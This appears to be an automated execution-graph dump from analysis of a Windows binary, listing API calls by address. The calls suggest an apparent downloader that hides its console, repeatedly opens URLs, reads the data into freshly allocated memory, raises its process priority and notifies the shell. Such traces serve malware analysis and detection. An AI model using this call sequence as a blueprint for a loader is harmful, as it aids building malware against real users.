                                                                  execution_graph 21308 485e99 21320 485e72 21308->21320 21310 485eb2 21311 485efe 21311->21310 21314 485f60 21311->21314 21327 488f1e 21311->21327 21339 485f8f 21314->21339 21318 485f53 21318->21314 21334 48a592 21318->21334 21321 485e7e 21320->21321 21322 485e93 21320->21322 21351 482009 14 API calls __dosmaperr 21321->21351 21322->21310 21322->21311 21350 486061 41 API calls __wsopen_s 21322->21350 21324 485e83 21352 48143d 39 API calls _Allocate 21324->21352 21328 488f2a 21327->21328 21329 488f54 21328->21329 21330 485e72 _Fgetc 39 API calls 21328->21330 21329->21318 21331 488f45 21330->21331 21353 492aa1 21331->21353 21333 488f4b 21333->21318 21365 488686 21334->21365 21340 485e72 _Fgetc 39 API calls 21339->21340 21341 485f9e 21340->21341 21342 485fb1 21341->21342 21343 486044 21341->21343 21345 485fce 21342->21345 21348 485ff5 21342->21348 21344 487204 __wsopen_s 64 API calls 21343->21344 21347 485f71 21344->21347 21381 487204 21345->21381 21348->21347 21392 48b116 43 API calls _Fputc 21348->21392 21350->21311 21351->21324 21354 492abb 21353->21354 21355 492aae 21353->21355 21357 492ac7 21354->21357 21363 482009 14 API calls __dosmaperr 21354->21363 21362 482009 14 API calls __dosmaperr 21355->21362 21357->21333 21359 492ab3 21359->21333 21360 492ae8 21364 48143d 39 API calls _Allocate 21360->21364 21362->21359 21363->21360 21370 488693 __Getctype 21365->21370 21366 4886d3 21379 482009 14 API calls __dosmaperr 21366->21379 21367 4886be RtlAllocateHeap 21368 4886d1 21367->21368 21367->21370 21372 487531 21368->21372 21370->21366 21370->21367 21378 482d69 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21370->21378 21373 487566 21372->21373 21374 48753c RtlFreeHeap 21372->21374 21373->21314 21374->21373 21375 487551 GetLastError 21374->21375 21376 48755e __dosmaperr 21375->21376 21380 482009 14 API calls __dosmaperr 21376->21380 21378->21370 21379->21368 21380->21373 21382 487210 ___scrt_is_nonwritable_in_current_image 21381->21382 21383 487251 21382->21383 21384 487297 21382->21384 21391 487218 21382->21391 21422 4813c0 29 API calls 2 library calls 21383->21422 21393 48feeb EnterCriticalSection 21384->21393 21387 48729d 21388 4872bb 21387->21388 21394 487315 21387->21394 21423 48730d LeaveCriticalSection __wsopen_s 21388->21423 21391->21347 21392->21347 21393->21387 21395 48733d 21394->21395 21421 487360 __wsopen_s 21394->21421 21396 487341 21395->21396 21398 48739c 21395->21398 21438 4813c0 29 API calls 2 library calls 21396->21438 21399 4873ba 21398->21399 21439 48b1b4 21398->21439 21424 486e5a 21399->21424 21403 487419 21405 48742d 21403->21405 21406 487482 WriteFile 21403->21406 21404 4873d2 21407 4873da 21404->21407 21408 487401 21404->21408 21409 48746e 21405->21409 21410 487435 21405->21410 21411 4874a4 GetLastError 21406->21411 21406->21421 21407->21421 21442 486df2 6 API calls __wsopen_s 21407->21442 21443 486a2b 45 API calls 5 library calls 21408->21443 21431 486ed7 21409->21431 21413 48745a 21410->21413 21414 48743a 21410->21414 21411->21421 21445 48709b 8 API calls 3 library calls 21413->21445 21417 487443 21414->21417 21414->21421 21444 486fb2 7 API calls 2 library calls 21417->21444 21420 487414 21420->21421 21421->21388 21422->21391 21423->21391 21425 492aa1 __fread_nolock 39 API calls 21424->21425 21428 486e6c 21425->21428 21426 486ed0 21426->21403 21426->21404 21427 486e9a 21427->21426 21430 486eb4 GetConsoleMode 21427->21430 21428->21426 21428->21427 21446 480620 39 API calls 2 library calls 21428->21446 21430->21426 21436 486ee6 __wsopen_s 21431->21436 21432 486f97 21447 47a256 21432->21447 21434 486fb0 21434->21421 21435 486f56 WriteFile 21435->21436 21437 486f99 GetLastError 21435->21437 21436->21432 21436->21435 21437->21432 21438->21421 21455 48b093 21439->21455 21441 48b1cd 21441->21399 21442->21421 21443->21420 21444->21421 21445->21420 21446->21427 21448 47a25f IsProcessorFeaturePresent 21447->21448 21449 47a25e 21447->21449 21451 47a99f 21448->21451 21449->21434 21454 47a962 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21451->21454 21453 47aa82 21453->21434 21454->21453 21461 490167 21455->21461 21457 48b0a5 21458 48b0c1 SetFilePointerEx 21457->21458 21460 48b0ad __wsopen_s 21457->21460 21459 48b0d9 GetLastError 21458->21459 21458->21460 21459->21460 21460->21441 21462 490189 21461->21462 21463 490174 21461->21463 21467 4901ae 21462->21467 21476 481ff6 14 API calls __dosmaperr 21462->21476 21474 481ff6 14 API calls __dosmaperr 21463->21474 21466 490179 21475 482009 14 API calls __dosmaperr 21466->21475 21467->21457 21468 4901b9 21477 482009 14 API calls __dosmaperr 21468->21477 21471 490181 21471->21457 21472 4901c1 21478 48143d 39 API calls _Allocate 21472->21478 21474->21466 21475->21471 21476->21468 21477->21472 21479 487915 21480 487922 21479->21480 21484 48793a 21479->21484 21529 482009 14 API calls __dosmaperr 21480->21529 21482 487927 21530 48143d 39 API calls _Allocate 21482->21530 21485 487932 21484->21485 21486 487999 21484->21486 21487 48a592 _Ungetc 14 API calls 21484->21487 21488 485e72 _Fgetc 39 API calls 21486->21488 21487->21486 21489 4879b2 21488->21489 21499 48aaca 21489->21499 21492 485e72 _Fgetc 39 API calls 21493 4879eb 21492->21493 21493->21485 21494 485e72 _Fgetc 39 API calls 21493->21494 21495 4879f9 21494->21495 21495->21485 21496 485e72 _Fgetc 39 API calls 21495->21496 21497 487a07 21496->21497 21498 485e72 _Fgetc 39 API calls 21497->21498 21498->21485 21500 48aad6 ___scrt_is_nonwritable_in_current_image 21499->21500 21501 48aade 21500->21501 21505 48aaf9 21500->21505 21597 481ff6 14 API calls __dosmaperr 21501->21597 21503 48aae3 21598 482009 14 API calls __dosmaperr 21503->21598 21506 48ab10 21505->21506 21507 48ab4b 21505->21507 21599 481ff6 14 API calls __dosmaperr 21506->21599 21509 48ab69 21507->21509 21510 48ab54 21507->21510 21531 48feeb EnterCriticalSection 21509->21531 21602 481ff6 14 API calls __dosmaperr 21510->21602 21511 48ab15 21600 482009 14 API calls __dosmaperr 21511->21600 21512 4879ba 21512->21485 21512->21492 21516 48ab59 21603 482009 14 API calls __dosmaperr 21516->21603 21517 48ab6f 21520 48ab8e 21517->21520 21521 48aba3 21517->21521 21518 48ab1d 21601 48143d 39 API calls _Allocate 21518->21601 21604 482009 14 API calls __dosmaperr 21520->21604 21532 48abe3 21521->21532 21525 48ab9e 21606 48abdb LeaveCriticalSection __wsopen_s 21525->21606 21526 48ab93 21605 481ff6 14 API calls __dosmaperr 21526->21605 21529->21482 21531->21517 21533 48ac0d 21532->21533 21534 48abf5 21532->21534 21536 48af4f 21533->21536 21541 48ac50 21533->21541 21607 481ff6 14 API calls __dosmaperr 21534->21607 21629 481ff6 14 API calls __dosmaperr 21536->21629 21537 48abfa 21608 482009 14 API calls __dosmaperr 21537->21608 21540 48af54 21630 482009 14 API calls __dosmaperr 21540->21630 21542 48ac02 21541->21542 21544 48ac5b 21541->21544 21548 48ac8b 21541->21548 21542->21525 21609 481ff6 14 API calls __dosmaperr 21544->21609 21545 48ac68 21631 48143d 39 API calls _Allocate 21545->21631 21547 48ac60 21610 482009 14 API calls __dosmaperr 21547->21610 21551 48aca4 21548->21551 21552 48acdf 21548->21552 21553 48acb1 21548->21553 21551->21553 21587 48accd 21551->21587 21614 489045 21552->21614 21611 481ff6 14 API calls __dosmaperr 21553->21611 21555 48acb6 21612 482009 14 API calls __dosmaperr 21555->21612 21559 492aa1 __fread_nolock 39 API calls 21562 48ae2b 21559->21562 21560 487531 ___free_lconv_mon 14 API calls 21563 48acf9 21560->21563 21561 48acbd 21613 48143d 39 API calls _Allocate 21561->21613 21565 48ae9f 21562->21565 21568 48ae44 GetConsoleMode 21562->21568 21566 487531 ___free_lconv_mon 14 API calls 21563->21566 21567 48aea3 ReadFile 21565->21567 21569 48ad00 21566->21569 21570 48aebb 21567->21570 21571 48af17 GetLastError 21567->21571 21568->21565 21572 48ae55 21568->21572 21573 48ad0a 21569->21573 21574 48ad25 21569->21574 21570->21571 21577 48ae94 21570->21577 21575 48ae7b 21571->21575 21576 48af24 21571->21576 21572->21567 21578 48ae5b ReadConsoleW 21572->21578 21621 482009 14 API calls __dosmaperr 21573->21621 21623 48b174 41 API calls 2 library calls 21574->21623 21593 48acc8 __fread_nolock 21575->21593 21624 481fae 14 API calls __dosmaperr 21575->21624 21627 482009 14 API calls __dosmaperr 21576->21627 21590 48aee0 21577->21590 21591 48aef7 21577->21591 21577->21593 21578->21577 21583 48ae75 GetLastError 21578->21583 21579 487531 ___free_lconv_mon 14 API calls 21579->21542 21583->21575 21585 48ad0f 21622 481ff6 14 API calls __dosmaperr 21585->21622 21586 48af29 21628 481ff6 14 API calls __dosmaperr 21586->21628 21587->21559 21625 48a8f5 44 API calls 3 library calls 21590->21625 21592 48af10 21591->21592 21591->21593 21626 48a73b 42 API calls __fread_nolock 21592->21626 21593->21579 21596 48af15 21596->21593 21597->21503 21598->21512 21599->21511 21600->21518 21602->21516 21603->21518 21604->21526 21605->21525 21606->21512 21607->21537 21608->21542 21609->21547 21610->21545 21611->21555 21612->21561 21615 489083 21614->21615 21616 489053 __Getctype 21614->21616 21633 482009 14 API calls __dosmaperr 21615->21633 21616->21615 21618 48906e RtlAllocateHeap 21616->21618 21632 482d69 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21616->21632 21618->21616 21619 489081 21618->21619 21619->21560 21621->21585 21622->21593 21623->21587 21624->21593 21625->21593 21626->21596 21627->21586 21628->21593 21629->21540 21630->21545 21632->21616 21633->21619 21634 479e79 21635 479e85 ___scrt_is_nonwritable_in_current_image 21634->21635 21660 47a07b 21635->21660 21637 479e8c 21638 479fe5 21637->21638 21647 479eb6 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 21637->21647 21686 47a517 4 API calls 2 library calls 21638->21686 21640 479fec 21687 483943 21 API calls _unexpected 21640->21687 21642 479ff2 21688 483907 21 API calls _unexpected 21642->21688 21644 479ffa 21645 479ed5 21646 479f56 21671 48358e 21646->21671 21647->21645 21647->21646 21682 48391d 39 API calls 4 library calls 21647->21682 21650 479f5c 21675 4735a0 GetConsoleWindow ShowWindow 21650->21675 21661 47a084 21660->21661 21689 47a785 IsProcessorFeaturePresent 21661->21689 21663 47a090 21690 47c9ae 10 API calls 2 library calls 21663->21690 21665 47a095 21666 47a099 21665->21666 21691 485632 21665->21691 21666->21637 21669 47a0b0 21669->21637 21672 48359c 21671->21672 21673 483597 21671->21673 21672->21650 21704 4832e8 53 API calls 21673->21704 21705 472ee0 21675->21705 21682->21646 21686->21640 21687->21642 21688->21644 21689->21663 21690->21665 21695 4924e4 21691->21695 21694 47c9cd 7 API calls 2 library calls 21694->21666 21696 4924f4 21695->21696 21697 47a0a2 21695->21697 21696->21697 21699 4867d0 21696->21699 21697->21669 21697->21694 21700 4867d7 21699->21700 21701 48681a GetStdHandle 21700->21701 21702 48687c 21700->21702 21703 48682d GetFileType 21700->21703 21701->21700 21702->21696 21703->21700 21704->21672 21789 472e50 21705->21789 21708 472f0f 21711 477990 68 API calls 21708->21711 21709 472eef 21793 477990 21709->21793 21713 472f23 21711->21713 21715 474e80 94 API calls 21713->21715 21717 472f2d 21715->21717 21716 472f0d Sleep 21719 473240 21716->21719 21810 472eb0 40 API calls 3 library calls 21717->21810 21720 473262 __wsopen_s 21719->21720 22017 472fd0 CreateDirectoryA 21720->22017 21723 47329c 21725 477990 68 API calls 21723->21725 21724 4732ba InternetOpenUrlA 21726 473304 21724->21726 21727 4732dc 21724->21727 21730 4732b0 21725->21730 22078 474c50 21726->22078 21728 477990 68 API calls 21727->21728 21731 4732f0 21728->21731 21732 474e80 94 API calls 21730->21732 21733 474e80 94 API calls 21731->21733 21732->21724 21734 4732fa InternetCloseHandle 21733->21734 21734->21726 21735 473319 21737 477990 68 API calls 21735->21737 21740 473371 21735->21740 21736 473378 InternetReadFile 21738 4733b7 21736->21738 21736->21740 21739 47334a 21737->21739 22097 474b40 21738->22097 21742 477990 68 API calls 21739->21742 21740->21736 21740->21738 22088 474d50 21740->22088 21745 473353 21742->21745 21747 474e80 94 API calls 21745->21747 21748 47335d InternetCloseHandle InternetCloseHandle 21747->21748 21748->21740 21749 4733eb 21750 47342c 21749->21750 21752 477990 68 API calls 21749->21752 22112 473820 21750->22112 21754 473419 21752->21754 21753 47343b 22117 4738f0 21753->22117 21755 477990 68 API calls 21754->21755 21757 473422 21755->21757 21758 474e80 94 API calls 21757->21758 21758->21750 21759 47344c task fpos 22127 473630 21759->22127 21761 473466 fpos 22131 473a00 21761->22131 21763 473488 22138 473670 21763->22138 21765 473493 fpos 21766 4734a2 VirtualAlloc 21765->21766 21767 4734b4 21766->21767 21771 4734d2 ctype fpos 21766->21771 21768 477990 68 API calls 21767->21768 21769 4734c8 21768->21769 21770 474e80 94 API calls 21769->21770 21770->21771 21772 4734f9 VirtualFree 21771->21772 21773 477990 68 API calls 21772->21773 21774 47351e 21773->21774 21775 474e80 94 API calls 21774->21775 21776 473528 21775->21776 22143 473610 21776->22143 21780 473543 22149 472e20 21780->22149 21782 473555 Sleep 21783 472f40 GetCurrentProcess SetPriorityClass GetCurrentThread SetThreadPriority 21782->21783 22644 4814c3 21783->22644 21785 472f71 SHChangeNotify 21786 472f83 21785->21786 22645 471170 21786->22645 21811 47b790 21789->21811 21792 472e8a 21792->21708 21792->21709 21795 4779c2 char_traits 21793->21795 21813 475750 21795->21813 21799 477b26 21806 477b65 char_traits 21799->21806 21817 476270 21799->21817 21800 472f03 21807 474e80 21800->21807 21801 477a57 char_traits 21801->21799 21803 477a6d 21801->21803 21828 4785c0 21801->21828 21820 476400 21803->21820 21805 4785c0 67 API calls 21805->21806 21806->21803 21806->21805 21957 477ca0 21807->21957 21810->21716 21812 472e6c GetVersionExA 21811->21812 21812->21792 21814 47577a std::ios_base::good 21813->21814 21815 475798 std::ios_base::good 21814->21815 21832 477140 21814->21832 21815->21801 21840 473e30 21817->21840 21818 476290 21818->21806 21821 476414 std::ios_base::good 21820->21821 21904 476430 21821->21904 21824 4756e0 21825 475703 21824->21825 21826 47572c 21825->21826 21919 4771e0 40 API calls std::ios_base::good 21825->21919 21826->21800 21829 4785d1 21828->21829 21830 4785e5 21829->21830 21920 474520 21829->21920 21830->21801 21834 477170 21832->21834 21833 4771cb 21833->21815 21834->21833 21835 475750 40 API calls 21834->21835 21838 477185 21835->21838 21836 4771bc 21837 4756e0 40 API calls 21836->21837 21837->21833 21838->21836 21839 476400 40 API calls 21838->21839 21839->21836 21841 473e42 21840->21841 21842 473e5b std::ios_base::failure::failure 21840->21842 21841->21818 21842->21841 21844 47eb89 21842->21844 21845 47eb9c _Fputc 21844->21845 21850 47e96b 21845->21850 21847 47ebb1 21858 47ddcb 21847->21858 21851 47e9a1 21850->21851 21852 47e979 21850->21852 21851->21847 21852->21851 21853 47e986 21852->21853 21854 47e9a8 21852->21854 21872 4813c0 29 API calls 2 library calls 21853->21872 21864 47e8c4 21854->21864 21859 47ddd7 21858->21859 21862 47ddee 21859->21862 21902 47df81 39 API calls 2 library calls 21859->21902 21861 47de01 21861->21841 21862->21861 21903 47df81 39 API calls 2 library calls 21862->21903 21865 47e8d0 ___scrt_is_nonwritable_in_current_image 21864->21865 21873 47e89c EnterCriticalSection 21865->21873 21867 47e8de 21874 47e91f 21867->21874 21871 47e8fc 21871->21847 21872->21851 21873->21867 21882 488f5c 21874->21882 21881 47e913 LeaveCriticalSection _Fgetc 21881->21871 21883 488f1e 39 API calls 21882->21883 21884 488f6d 21883->21884 21885 47e937 21884->21885 21886 489045 __fread_nolock 15 API calls 21884->21886 21889 47e9e2 21885->21889 21887 488fc6 21886->21887 21888 487531 ___free_lconv_mon 14 API calls 21887->21888 21888->21885 21891 47e9f4 21889->21891 21893 47e955 21889->21893 21890 47ea02 21892 4813c0 _Fputc 29 API calls 21890->21892 21891->21890 21891->21893 21896 47ea38 _Fputc ctype 21891->21896 21892->21893 21898 489007 21893->21898 21894 47e238 ___scrt_uninitialize_crt 64 API calls 21894->21896 21895 485e72 _Fgetc 39 API calls 21895->21896 21896->21893 21896->21894 21896->21895 21897 487204 __wsopen_s 64 API calls 21896->21897 21897->21896 21899 489012 21898->21899 21900 47e8eb 21898->21900 21899->21900 21901 47e238 ___scrt_uninitialize_crt 64 API calls 21899->21901 21900->21881 21901->21900 21902->21862 21903->21861 21905 476442 21904->21905 21908 4726b0 21905->21908 21909 47273c 21908->21909 21910 4726d9 21908->21910 21909->21824 21912 4726ea std::make_error_code 21910->21912 21916 47b1a3 RaiseException 21910->21916 21917 472650 40 API calls std::ios_base::failure::failure 21912->21917 21914 47272e 21918 47b1a3 RaiseException 21914->21918 21916->21912 21917->21914 21918->21909 21919->21826 21921 474530 char_traits 21920->21921 21922 4745c1 21921->21922 21923 47454a char_traits 21921->21923 21924 4745ff codecvt 21921->21924 21930 472ac0 21922->21930 21923->21830 21926 474656 21924->21926 21927 47464e 21924->21927 21926->21923 21928 47eb89 67 API calls 21926->21928 21927->21923 21929 472ac0 _Fputc 41 API calls 21927->21929 21928->21923 21929->21923 21933 47dfcb 21930->21933 21934 47dfde _Fputc 21933->21934 21939 47de07 21934->21939 21936 47dfed 21937 47ddcb _Fputc 39 API calls 21936->21937 21938 472ad2 21937->21938 21938->21923 21940 47de13 ___scrt_is_nonwritable_in_current_image 21939->21940 21941 47de40 21940->21941 21942 47de1c 21940->21942 21953 47e89c EnterCriticalSection 21941->21953 21954 4813c0 29 API calls 2 library calls 21942->21954 21945 47de49 21946 485e72 _Fgetc 39 API calls 21945->21946 21949 47de5e 21945->21949 21946->21949 21947 47defb _Fputc 21956 47df33 LeaveCriticalSection _Fgetc 21947->21956 21948 47deca 21955 4813c0 29 API calls 2 library calls 21948->21955 21949->21947 21949->21948 21952 47de35 _Fgetc 21952->21936 21953->21945 21954->21952 21955->21952 21956->21952 21964 4776e0 21957->21964 21959 477cb7 21968 478630 21959->21968 21962 477140 40 API calls 21963 474e8e 21962->21963 21963->21716 21965 47770a std::ios_base::getloc 21964->21965 21977 477890 21965->21977 21967 477728 shared_ptr ctype 21967->21959 21969 475750 40 API calls 21968->21969 21970 478668 21969->21970 21973 4785c0 67 API calls 21970->21973 21976 47867e char_traits 21970->21976 21971 476400 40 API calls 21972 478727 21971->21972 21974 4756e0 40 API calls 21972->21974 21973->21976 21975 477cc3 21974->21975 21975->21962 21976->21971 21991 479023 21977->21991 21981 4778ce 21990 4778ec 21981->21990 22010 4722d0 69 API calls std::_Facet_Register 21981->22010 21984 477976 21984->21967 21985 477901 21986 477909 21985->21986 21988 477910 21985->21988 22011 471b90 RaiseException std::bad_alloc::bad_alloc Concurrency::cancel_current_task 21986->22011 22012 479391 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21988->22012 22003 47907b 21990->22003 21992 479032 21991->21992 21993 479039 21991->21993 22013 481569 6 API calls std::_Lockit::_Lockit 21992->22013 21995 4778b5 21993->21995 22014 479a98 EnterCriticalSection 21993->22014 21997 471e00 21995->21997 21998 471e45 21997->21998 21999 471e11 21997->21999 21998->21981 22000 479023 std::_Lockit::_Lockit 7 API calls 21999->22000 22001 471e1b 22000->22001 22002 47907b std::_Lockit::~_Lockit 2 API calls 22001->22002 22002->21998 22004 479085 22003->22004 22005 481577 22003->22005 22006 479098 22004->22006 22015 479aa6 LeaveCriticalSection 22004->22015 22016 481552 LeaveCriticalSection 22005->22016 22006->21984 22008 48157e 22008->21984 22010->21985 22011->21990 22012->21990 22013->21995 22014->21995 22015->22006 22016->22008 22152 475280 22017->22152 22019 473008 22020 475280 std::ios_base::failure::failure 40 API calls 22019->22020 22021 47301c 22020->22021 22156 472cb0 InternetOpenA 22021->22156 22025 47303c 22026 475210 task 39 API calls 22025->22026 22027 47304b 22026->22027 22028 475280 std::ios_base::failure::failure 40 API calls 22027->22028 22029 473058 22028->22029 22030 475280 std::ios_base::failure::failure 40 API calls 22029->22030 22031 47306c 22030->22031 22032 472cb0 105 API calls 22031->22032 22033 47307d 22032->22033 22034 475210 task 39 API calls 22033->22034 22035 47308c 22034->22035 22036 475210 task 39 API calls 22035->22036 22037 47309b 22036->22037 22038 475280 std::ios_base::failure::failure 40 API calls 22037->22038 22039 4730ab 22038->22039 22040 475280 std::ios_base::failure::failure 40 API calls 22039->22040 22041 4730c2 22040->22041 22042 472cb0 105 API calls 22041->22042 22043 4730d9 22042->22043 22044 475210 task 39 API calls 22043->22044 22045 4730eb 22044->22045 22046 475210 task 39 API calls 22045->22046 22047 4730fd 22046->22047 22048 475280 std::ios_base::failure::failure 40 API calls 22047->22048 22049 47310d 22048->22049 22050 475280 std::ios_base::failure::failure 40 API calls 22049->22050 22051 473124 22050->22051 22052 472cb0 105 API calls 22051->22052 22053 47313b 22052->22053 22054 475210 task 39 API calls 22053->22054 22055 47314d 22054->22055 22056 475210 task 39 API calls 22055->22056 22057 47315f 22056->22057 22058 475280 std::ios_base::failure::failure 40 API calls 22057->22058 22059 47316f 22058->22059 22060 475280 std::ios_base::failure::failure 40 API calls 22059->22060 22061 473186 22060->22061 22062 472cb0 105 API calls 22061->22062 22063 47319d 22062->22063 22064 475210 task 39 API calls 22063->22064 22065 4731af 22064->22065 22066 475210 task 39 API calls 22065->22066 22067 4731c1 22066->22067 22068 475280 std::ios_base::failure::failure 40 API calls 22067->22068 22069 4731d1 22068->22069 22070 475280 std::ios_base::failure::failure 40 API calls 22069->22070 22071 4731e8 22070->22071 22072 472cb0 105 API calls 22071->22072 22073 4731ff 22072->22073 22074 475210 task 39 API calls 22073->22074 22075 473211 22074->22075 22076 475210 task 39 API calls 22075->22076 22077 473223 Sleep InternetOpenA 22076->22077 22077->21723 22077->21724 22079 474c7b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 22078->22079 22229 476310 22079->22229 22085 474d17 22086 474d31 22085->22086 22087 476400 40 API calls 22085->22087 22086->21735 22087->22086 22089 475750 40 API calls 22088->22089 22091 474d88 22089->22091 22090 476400 40 API calls 22092 474e4e 22090->22092 22094 476270 67 API calls 22091->22094 22096 474d9e 22091->22096 22093 4756e0 40 API calls 22092->22093 22095 474e63 22093->22095 22094->22096 22095->21740 22096->22090 22436 475e60 22097->22436 22100 4733c2 InternetCloseHandle InternetCloseHandle 22102 473720 22100->22102 22101 476400 40 API calls 22101->22100 22103 47374b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 22102->22103 22448 475ad0 22103->22448 22106 475fb0 44 API calls 22107 4737c9 22106->22107 22108 475ed0 98 API calls 22107->22108 22109 4737e7 22108->22109 22110 473801 22109->22110 22111 476400 40 API calls 22109->22111 22110->21749 22111->22110 22452 475960 22112->22452 22114 47384c 22115 47388d 22114->22115 22456 4762d0 22114->22456 22115->21753 22118 473927 std::ios_base::good 22117->22118 22119 476430 40 API calls 22118->22119 22120 473943 22119->22120 22121 475960 69 API calls 22120->22121 22123 473951 22121->22123 22122 4739cb 22122->21759 22123->22122 22124 4762d0 68 API calls 22123->22124 22125 473998 fpos 22124->22125 22125->22122 22126 476400 40 API calls 22125->22126 22126->22122 22128 47364a 22127->22128 22542 477d00 22128->22542 22130 47365a 22130->21761 22132 475960 69 API calls 22131->22132 22135 473a47 22132->22135 22133 476400 40 API calls 22134 473b20 22133->22134 22134->21763 22137 473aa2 22135->22137 22583 4762a0 22135->22583 22137->22133 22139 475e60 70 API calls 22138->22139 22140 473682 22139->22140 22141 47369c 22140->22141 22142 476400 40 API calls 22140->22142 22141->21765 22142->22141 22629 475a20 22143->22629 22146 473570 22634 4736c0 22146->22634 22148 473582 std::bad_exception::~bad_exception 22148->21780 22641 474b90 22149->22641 22151 472e32 std::bad_exception::~bad_exception 22151->21782 22153 4752ab std::ios_base::failure::failure 22152->22153 22180 4767a0 22153->22180 22155 4752dd task 22155->22019 22157 472cee 22156->22157 22158 472e08 22156->22158 22189 472b40 22157->22189 22177 475210 22158->22177 22160 472cfb std::runtime_error::runtime_error 22161 472d14 InternetOpenUrlA 22160->22161 22162 475210 task 39 API calls 22161->22162 22163 472d2a 22162->22163 22164 472dfe InternetCloseHandle 22163->22164 22165 472b40 40 API calls 22163->22165 22164->22158 22166 472d41 22165->22166 22199 474bf0 22166->22199 22169 475210 task 39 API calls 22174 472d75 22169->22174 22170 472de2 InternetCloseHandle 22172 472e20 70 API calls 22170->22172 22171 472d98 InternetReadFile 22173 472dd7 22171->22173 22171->22174 22172->22164 22175 474b40 71 API calls 22173->22175 22174->22170 22174->22171 22174->22173 22176 474d50 68 API calls 22174->22176 22175->22170 22176->22174 22224 476630 22177->22224 22179 47521f task 22179->22025 22181 4767b0 std::runtime_error::runtime_error char_traits 22180->22181 22184 4767d0 22181->22184 22183 4767c9 22183->22155 22185 476828 22184->22185 22187 4767e4 std::ios_base::failure::failure task std::runtime_error::runtime_error 22184->22187 22188 4780d0 40 API calls 4 library calls 22185->22188 22187->22183 22188->22187 22190 472b6b task 22189->22190 22203 474f40 22190->22203 22192 472c20 std::ios_base::failure::failure 22207 474f20 22192->22207 22195 475210 task 39 API calls 22196 472c97 22195->22196 22196->22160 22197 472b93 std::runtime_error::runtime_error 22197->22192 22210 4750a0 40 API calls 2 library calls 22197->22210 22200 474c0b std::runtime_error::runtime_error 22199->22200 22201 474c50 100 API calls 22200->22201 22202 472d69 22201->22202 22202->22169 22204 474f5a 22203->22204 22211 477eb0 22204->22211 22206 474f6a 22206->22197 22219 476470 22207->22219 22210->22197 22212 477eeb std::ios_base::failure::failure 22211->22212 22213 477f3c task 22212->22213 22217 478780 40 API calls 22212->22217 22213->22206 22215 477efd 22218 4783b0 39 API calls Concurrency::cancellation_token_source::~cancellation_token_source 22215->22218 22217->22215 22218->22213 22221 4764b4 task Concurrency::cancellation_token_source::~cancellation_token_source 22219->22221 22220 472c88 22220->22195 22221->22220 22223 477340 39 API calls allocator 22221->22223 22223->22220 22226 476656 task ctype 22224->22226 22225 47669a task 22225->22179 22226->22225 22228 477570 39 API calls allocator 22226->22228 22228->22225 22231 47633b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 22229->22231 22246 4772b0 22231->22246 22233 475fb0 22279 4770e0 22233->22279 22235 475fd4 22284 475d90 22235->22284 22237 474cf9 22238 475ed0 22237->22238 22239 475efb 22238->22239 22245 475ef7 shared_ptr 22238->22245 22290 4797c3 22239->22290 22242 475d90 39 API calls 22243 475f2a 22242->22243 22300 477db0 69 API calls 5 library calls 22243->22300 22245->22085 22255 472940 22246->22255 22249 4776e0 69 API calls 22250 4772dc 22249->22250 22251 476400 40 API calls 22250->22251 22252 4772f7 22250->22252 22251->22252 22253 474cbb 22252->22253 22262 4795dd 9 API calls 2 library calls 22252->22262 22253->22233 22263 472750 22255->22263 22260 4729c6 22260->22249 22262->22253 22264 4726b0 std::ios_base::clear 40 API calls 22263->22264 22265 472765 22264->22265 22266 479d53 22265->22266 22268 479d58 ___std_exception_copy 22266->22268 22267 4729b2 22267->22260 22275 471f20 44 API calls std::locale::_Init 22267->22275 22268->22267 22271 479d74 std::_Facet_Register 22268->22271 22276 482d69 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 22268->22276 22270 47a3e9 stdext::threads::lock_error::lock_error 22278 47b1a3 RaiseException 22270->22278 22271->22270 22277 47b1a3 RaiseException 22271->22277 22273 47a406 22275->22260 22276->22268 22277->22270 22278->22273 22280 479d53 std::_Facet_Register 3 API calls 22279->22280 22281 4770f9 22280->22281 22283 47710d 22281->22283 22288 471f20 44 API calls std::locale::_Init 22281->22288 22283->22235 22285 475d9f 22284->22285 22286 475e00 22285->22286 22289 47e856 39 API calls 2 library calls 22285->22289 22286->22237 22288->22283 22289->22286 22293 47971d 22290->22293 22291 475f0c 22291->22242 22291->22245 22292 47977e 22299 479785 22292->22299 22301 4797cc 22292->22301 22293->22291 22293->22292 22295 4797cc 42 API calls 22293->22295 22295->22292 22299->22291 22310 47e487 22299->22310 22300->22245 22316 4818cf 22301->22316 22304 4811de 22305 4811f1 _Fputc 22304->22305 22368 480f35 22305->22368 22308 47ddcb _Fputc 39 API calls 22309 481213 22308->22309 22309->22299 22311 47e49a _Fputc 22310->22311 22402 47e362 22311->22402 22313 47e4a6 22314 47ddcb _Fputc 39 API calls 22313->22314 22315 47e4b2 22314->22315 22315->22291 22318 481818 ___scrt_is_nonwritable_in_current_image 22316->22318 22317 48182b 22341 482009 14 API calls __dosmaperr 22317->22341 22318->22317 22321 48184b 22318->22321 22320 481830 22342 48143d 39 API calls _Allocate 22320->22342 22322 48185d 22321->22322 22323 481850 22321->22323 22333 48776f 22322->22333 22343 482009 14 API calls __dosmaperr 22323->22343 22327 47979e 22327->22291 22327->22304 22329 48187a 22345 4818b8 LeaveCriticalSection _Fgetc 22329->22345 22330 48186d 22344 482009 14 API calls __dosmaperr 22330->22344 22334 48777b ___scrt_is_nonwritable_in_current_image 22333->22334 22346 48150a EnterCriticalSection 22334->22346 22336 487789 22347 487813 22336->22347 22341->22320 22343->22327 22344->22327 22345->22327 22346->22336 22354 487836 22347->22354 22348 48788e 22349 488686 __Getctype 14 API calls 22348->22349 22350 487897 22349->22350 22352 487531 ___free_lconv_mon 14 API calls 22350->22352 22353 4878a0 22352->22353 22359 487796 22353->22359 22365 488c97 6 API calls std::_Lockit::_Lockit 22353->22365 22354->22348 22354->22354 22354->22359 22363 47e89c EnterCriticalSection 22354->22363 22364 47e8b0 LeaveCriticalSection 22354->22364 22356 4878bf 22366 47e89c EnterCriticalSection 22356->22366 22360 4877cf 22359->22360 22367 481552 LeaveCriticalSection 22360->22367 22362 481866 22362->22329 22362->22330 22363->22354 22364->22354 22365->22356 22366->22359 22367->22362 22369 